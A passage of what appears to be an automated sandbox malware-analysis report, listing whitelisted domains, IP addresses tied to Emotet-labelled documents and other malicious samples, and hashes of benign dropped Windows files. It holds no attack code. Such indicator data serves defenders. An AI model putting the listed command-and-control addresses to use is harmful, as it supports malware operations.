                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                          Simulations

                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                          17:56:20API Interceptor15x Sleep call for process: svchost.exe modified
                                                                                                                                                                                          17:57:36API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                          IPs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          178.62.39.238Dokumente #9679310812.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Invoices Overdue.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Invoices Overdue.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Dokumente vom Notar #33062192.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Dokumente vom Notar #33062192.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Emotet21.02.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Emotet21.02.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Emotet.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Emotet.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Document needed.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Document needed.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Question.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Question.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          http://ardri-lubrication.com/Question/Get hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          newemotet.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          newemotet.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          http://ardri-lubrication.com/Question/Get hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Rechnung49915.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/
                                                                                                                                                                                          Rechnung49915.docGet hashmaliciousBrowse
                                                                                                                                                                                          • 178.62.39.238:443/

                                                                                                                                                                                          Domains

                                                                                                                                                                                          No context

                                                                                                                                                                                          ASN

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          GD-EMEA-DC-SXB1DE5zc9vbGBo3.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 217.172.179.54
                                                                                                                                                                                          InnAcjnAmG.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 217.172.179.54
                                                                                                                                                                                          yxghUyIGb4.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 80.86.91.232
                                                                                                                                                                                          TaTYytHaBk.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 85.25.43.31
                                                                                                                                                                                          8X93Tzvd7V.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 217.172.179.54
                                                                                                                                                                                          u8A8Qy5S7O.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 217.172.179.54
                                                                                                                                                                                          SecuriteInfo.com.Mal.GandCrypt-A.24654.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 217.172.179.54
                                                                                                                                                                                          SecuriteInfo.com.Mal.GandCrypt-A.5674.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 217.172.179.54
                                                                                                                                                                                          csrss.bin.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 188.138.33.233
                                                                                                                                                                                          yx8DBT3r5r.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 92.51.129.66
                                                                                                                                                                                          E00636067E.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 85.25.177.199
                                                                                                                                                                                          http___contributeindustry.com_js_engine-rawbin.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 85.25.177.199
                                                                                                                                                                                          z2xQEFs54b.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 87.230.93.218
                                                                                                                                                                                          M9j9PKzG99.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 62.75.168.152
                                                                                                                                                                                          u9q6OemjX5.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 62.75.168.152
                                                                                                                                                                                          Iy5GlyAujZ.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 62.75.168.152
                                                                                                                                                                                          DPLhVm07M0.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 62.75.168.152
                                                                                                                                                                                          KMD9GwwC1a.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 62.75.168.152
                                                                                                                                                                                          T6c9JZgNiz.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 62.75.168.152
                                                                                                                                                                                          HHCCEzq4Kv.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 62.75.168.152
                                                                                                                                                                                          DIGITALOCEAN-ASNUSdocument-1687338102.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1483863414.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1972828985.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1467123967.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-691225626.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1206379718.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-2087798864.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1911441842.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-647030388.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1151537809.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-208586804.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-649562845.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1942414654.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-72883322.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1491029660.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-298736015.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1541325888.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-2218460.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-252802897.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250
                                                                                                                                                                                          document-1218757281.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 159.203.6.250

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          51c64c77e60f3980eea90869b68c58a84hI17uz4Wc.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          4hI17uz4Wc.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          i1grN6m67U.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          BRWv1eLN5K.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          BRWv1eLN5K.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          848o9nyjWs.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          FXnQGP41Ah.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          6ih1UA6v2N.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          tA2Q9s0jKz.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          hO13a870uv.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          1BTTC3d3jr.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          1BTTC3d3jr.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          ScGL6MQBqu.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          SfFJ98T3X8.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          QFOK5ewvDO.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          2y0OqbQRYZ.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          ChmIQdHzLi.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          ChmIQdHzLi.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          pbEVLS7U48.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153
                                                                                                                                                                                          pbEVLS7U48.dllGet hashmaliciousBrowse
                                                                                                                                                                                          • 167.114.153.153

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):24576
                                                                                                                                                                                          Entropy (8bit):0.36205444996716485
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:UtcctcMtcctcMtcctcMtcctcQtcctc0tcctc:UtTtDtTtDtTtDtTtTtTtbtTt
                                                                                                                                                                                          MD5:353C0E84A6C573D30B15481706263B9A
                                                                                                                                                                                          SHA1:4DCBF5ED97F1251EEF6E0747906368AB5639D0FA
                                                                                                                                                                                          SHA-256:4412C6044B8C975D5BAB1F0E173339AE2A091A3B4D2DFBF771F1E9B854EF1751
                                                                                                                                                                                          SHA-512:210B6E533923CF5F3FE255C39E1B2D243F675D2C022FA613E3ABD680FB552A2FD9079BF1699C91A5033AED47E29EE0191CF6E307429554A3128D2C009E047AFD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .............'..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................).............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                          Entropy (8bit):0.23523012437730165
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:bDqGaD0JcaaD0JwQQw6Ag/0bjSQJPShFsX81J9FsX81J:bDWgJctgJw0rjSuqhF71F7
                                                                                                                                                                                          MD5:646075E44F100F883F7E59152E3EF4CA
                                                                                                                                                                                          SHA1:4CBEC5A008144A6283A453F8245AC73CF62657E6
                                                                                                                                                                                          SHA-256:0EA2D94708F340F247E7FBF92279A251ADBA25EBFE76393D972AB622E87B3EFC
                                                                                                                                                                                          SHA-512:70D293DCE1930945F92D9F1924F4622187D47BCE435AE54C9DF0702FD59F012D09405E6428204F8C2F62E3C45426A552FA9EB0C4C880A7040B3FACA08CE21C50
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ....E..h..(......8...y#.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................8...y#...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x29e27591, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):131072
                                                                                                                                                                                          Entropy (8bit):0.09467293836341115
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:oW+jPjW+jPcW+jW+uxW+9zxW+96PZO+39PZO+3:lPXP
                                                                                                                                                                                          MD5:B8CE1C6FACE13ACEE5F9A2334C038E69
                                                                                                                                                                                          SHA1:7C87D0EF162E24FB745BD424CAAFDECE4A56A578
                                                                                                                                                                                          SHA-256:CE2A119FBC50A1B20863CB932398059123C650664D78D1DD9AF7E9891B9F2472
                                                                                                                                                                                          SHA-512:0D7CE407832A6122E0F2EE24741F197168104783CE48984362C56682D675ADA9A18E6CD47EF7F3FDFDA15A177BD64B8E2BDAECCAD589CB2D01336E1494939876
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ).u.... ................e.f.3...w........................&..........w...8...y#.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................}...8...y#k................?]...8...y#.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):0.10976170370409762
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:PBn7t4I+hc4lGV2Bn7O/z3vOXA5Bn7tX/b3AXAbXTrBRsXv/b3aYvXA:p7t4IDC7O/z2A7tX/bwsXBRsf/bqYv
                                                                                                                                                                                          MD5:C66C2E48C766CF3471C42B08F6C8ED7B
                                                                                                                                                                                          SHA1:7444129374AC0277347BF95387C6A3E0B5410486
                                                                                                                                                                                          SHA-256:9F8F4BED999D2349E17A3EAE3D886A4BB4AED5ED9D5A4AC741A2656A7C00BC3C
                                                                                                                                                                                          SHA-512:5D519ADF3350D549ED8532806F892E93A52168F326078240663B0612CBB32C6FE9FFC392F9C5055A0D7A0F1F1CDDE60E899649B096F6ACA102F6DFEFBDD5415D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .........................................3...w...8...y#......w...............w.......w....:O.....w..................?]...8...y#.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):471
                                                                                                                                                                                          Entropy (8bit):7.157716480430632
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:J0MqCG5o7ENYZVp9s9lbM79En/7g3ikpVp4tSZfDwU8lET8VIWBMdytUTG8WGUJF:JNG5Ug3bMSMp4t8fDw/3egUTGHZJTw+n
                                                                                                                                                                                          MD5:2CE2AA52CC1BFC68292005EB8A7E374B
                                                                                                                                                                                          SHA1:24E70BA14E2421CD3C5EE2FBB6B17EDEB460872A
                                                                                                                                                                                          SHA-256:6B9040BD1119EDF96DCD1D66C47C885309928E31D4241DEA855354BF05D74310
                                                                                                                                                                                          SHA-512:C865F2098E4E6774575B46F42B3A12B9D3A3121BB544AD4599CC0075F8A183F0F87C7FF20EBCDAC7C29A396BB83D5E0D00EF9AE33D36AAFF29A378520A08EAD9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: 0..........0.....+.....0......0...0........a..1a./(.F8.,......20210330173300Z0s0q0I0...+........._.z....'.5..C.........a..1a./(.F8.,.......m..a.)0.3..]r....20210330173300Z....20210406164800Z0...*.H....................`..WX.b.......J...S\ K.......f.Z..Y..sTp7..Ot.IdE..."._I..O_.xI-.jN.y}5....V....f...*</.l|..yU.F..iB.....}.XlB.a.u.t.d.....s..u.\.{.#.].._.pJ."...^D:2........]y...h_..S...)6...3.h.Y...\...(?..R6q^...K.D.Y..}.a.c.w..9......k!.j.P...W.I(.%.
                                                                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):852
                                                                                                                                                                                          Entropy (8bit):3.7893639577914384
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:c6mxMiv8sFFu6JPPDTGLwaYRRkJf7d6mxMiv8sFFu6JPPDTGLwaYRRkJk:c6mxxvPbJ/GJsRY6mxxvPbJ/GJsRD
                                                                                                                                                                                          MD5:7E058E2DB33BB1959E473791E87D0598
                                                                                                                                                                                          SHA1:B95B52C72CC561A1C2FED2523318522ED05D3795
                                                                                                                                                                                          SHA-256:E6203AFC6C304CDF4AE846940CAC38A445397B394E6BC8727F976DAE1BFD8022
                                                                                                                                                                                          SHA-512:6031C2BE6382E2D275144436EA0F1EFA6FC82F593BBCD169BC43C5A28345C261568ABB91BEB89B68B0066F85365381613E9BEBFBB7D6F5F61E41A4E28BAAA8BE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: p...... ............&..(....................................................... ........n..%..3x..................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.Q.X.6.Z.6.g.A.i.d.t.S.e.f.N.c.6.D.C.0.O.I.n.q.P.H.D.Q.Q.U.D.4.B.h.H.I.I.x.Y.d.U.v.K.O.e.N.R.j.i.0.L.O.H.G.2.e.I.C.E.A.h.t.5.a.O.I.r.W.G.A.K.T.C.h.M.x.L.x.X.X.I.%.3.D...".6.0.6.3.6.0.c.c.-.1.d.7."...p...... ............&..(................n..%...`W..+...................`W..+.. ........n..%..3x..................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.Q.X.6.Z.6.g.A.i.d.t.S.e.f.N.c.6.D.C.0.O.I.n.q.P.H.D.Q.Q.U.D.4.B.h.H.I.I.x.Y.d.U.v.K.O.e.N.R.j.i.0.L.O.H.G.2.e.I.C.E.A.h.t.5.a.O.I.r.W.G.A.K.T.C.h.M.x.L.x.X.X.I.%.3.D...".6.0.6.3.6.0.c.c.-.1.d.7."...
                                                                                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):0.10993337207197429
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:26WjXm/Ey6q9995kcNalq3qQ10nMCldimE8eawHjcof:26jl685LyMCldzE9BHjcI
                                                                                                                                                                                          MD5:91BA3CD3A613DD882D427622B10F0650
                                                                                                                                                                                          SHA1:6697F03A22A24B9394CDED749685577C2CA8BF30
                                                                                                                                                                                          SHA-256:14AA497AF89DBC41F21A787CF43452D769E7A104D4A03258937E6FC7B379A61F
                                                                                                                                                                                          SHA-512:530A26B70524E9B5186B09C0C9EF0D4C25E942D497D2688642DCD8DF178909A240FABE1B9B8A695171742FE066184F67D29C400ACAA319B9B5D78219A58D4496
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ....................................................................................h............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................\HJ/..... ...../...&..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....h...,.......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):0.1126747574874679
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:2cjXm/Ey6q9995kcNnEz1miM3qQ10nMCldimE8eawHza1miIHP:El68c1tMLyMCldzE9BHza1tIv
                                                                                                                                                                                          MD5:E2D597EA15A6F7B2C7EA855019422D01
                                                                                                                                                                                          SHA1:7D2A93EBCA549402E723EFCFE3B53A4CBC89E594
                                                                                                                                                                                          SHA-256:4F9B396999FD8F5EE1D5D1103D985AD7AABC79B90B04B2C8F3E67A4E0A8AC33C
                                                                                                                                                                                          SHA-512:DF5FD17EC52E80A0E5F288B4C77C9E06B789D48B152436FFAA167F97A98E7954BD4A992B3C55EDD3332BAFC5D0E841D84AF4880F14C718EBCDB7B1494168124B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ....................................................................................h............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................\HJ/..... .........&..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....h...........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):0.11250153424289781
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:KjXm/Ey6q9995kcN4z1mK2P3qQ10nMCldimE8eawHza1mKKcP:Pl68g1iPLyMCldzE9BHza1x
                                                                                                                                                                                          MD5:CFD76940CE786F2B826DC055471F8728
                                                                                                                                                                                          SHA1:AD58B13140D189551901FB208CB19372DADE8873
                                                                                                                                                                                          SHA-256:056DDF892673A724E522397D8241745CA04F21A971B81112DDC9CDF61A9A466A
                                                                                                                                                                                          SHA-512:E69CB3DA9A01E5945AEB537387AD7B3FF817D6F26645A1AAD2FC308525BC49A346B75CC557D2D52F9C825B91FD943AAA202CFD7A77C0942F3703617F93762B27
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ....................................................................................h............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................\HJ/..... .........&..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....h...........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):906
                                                                                                                                                                                          Entropy (8bit):3.148704776949269
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:58KRBubdpkoF1AG3rlsglJDxZk9+MlWlLehB4yAq7ejCEsglJDQw:OaqdmuF3rlxx++kWReH4yJ7MNxQw
                                                                                                                                                                                          MD5:5B593B02A648FCE8EF40A42F6F733497
                                                                                                                                                                                          SHA1:2DFD9C962525858C098635ADCE05FF1031ABAFE7
                                                                                                                                                                                          SHA-256:6E66D7ED8E8E2434F976120E0BE8BFF3B4DB86323F236176CB119AC2AF872135
